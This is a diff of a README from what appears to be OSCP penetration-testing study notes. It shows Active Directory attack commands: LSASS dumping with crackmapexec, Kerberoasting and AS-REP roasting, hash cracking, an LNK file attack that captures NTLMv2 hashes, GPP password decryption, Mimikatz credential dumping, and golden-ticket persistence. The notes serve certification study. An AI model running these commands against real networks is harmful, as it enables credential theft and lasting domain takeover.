AbdullahZuhair21/OSCP-Notes/README.md

 .          crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth -M lsassy    (dump lsass. it may have some secret credentials that secretdump didn't reflect)
 .          cmedb     (crackmapexec database) Kerberoasting
-.          python GetUserSPNs.py <domain/username:password> -dc-ip <ip of DC> -request     (attacking service accounts. from the enumeration find the service accounts that are in the admin group. you can use ldapdomaindump or bloodhound)
+.          python3 GetUserSPNs.py <domain/username:password> -dc-ip <ip of DC> -request    (Get the password of a service. ldapdomaindump/bloodhound for service enum)
-.          hashcat -m 13100 kerberoast.txt rockyou.txt
+.          python3 GetNPUsers.py raman.local/<username> -dc-ip <IP of DC>     (Get the password of a user) .          hashcat -m 13100 kerberoast.txt rockyou.txt
 Token Impersonation
-.          check token impersonation in the Windows Privilege escalation section .
+.          check token impersonation in the Windows Privilege escalation section LNK File Attack
+.          netexec smb 10.0.2.19 -d  raman.local -u machine1 -p Ab2002.. -M slinky -o NAME=test SERVER=10.0.2.10     (create & upload a file in smb share so you will get NTLMv2 hash)
+GPP / cPassword
+.          you may find a hashed password in a particular xml file. if you find cpassword='<gpp-hash>' you can crack the password using
+.          gpp-decrypt <gpp-hash>
+Mimikatz
+.          privilege::debug | token::elevate | sekurlsa::logonpasswords

+**Persistence**
+Golden Ticket - Mimikatz
 .
+Dump the hashes using Sercretsdump.py after accessing DC .
+You need to have the Administrator hash along with Kerbtgt.
+.          run mimikatz.exe | kerberos::golden /domain:raman.local /sid:S-1-5-21-1314456-456789-12345687 /user:Administrator:NTLM /krbtgt:NTLM /ptt
+.
+For SID don't take the last portion; for Administrator&kebtgt hashes take only NTLM hash from NT:NTLM; watch nakera episode 58 FYR
 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Platforms
 1. for Initial Access work on eJPT, This article and official content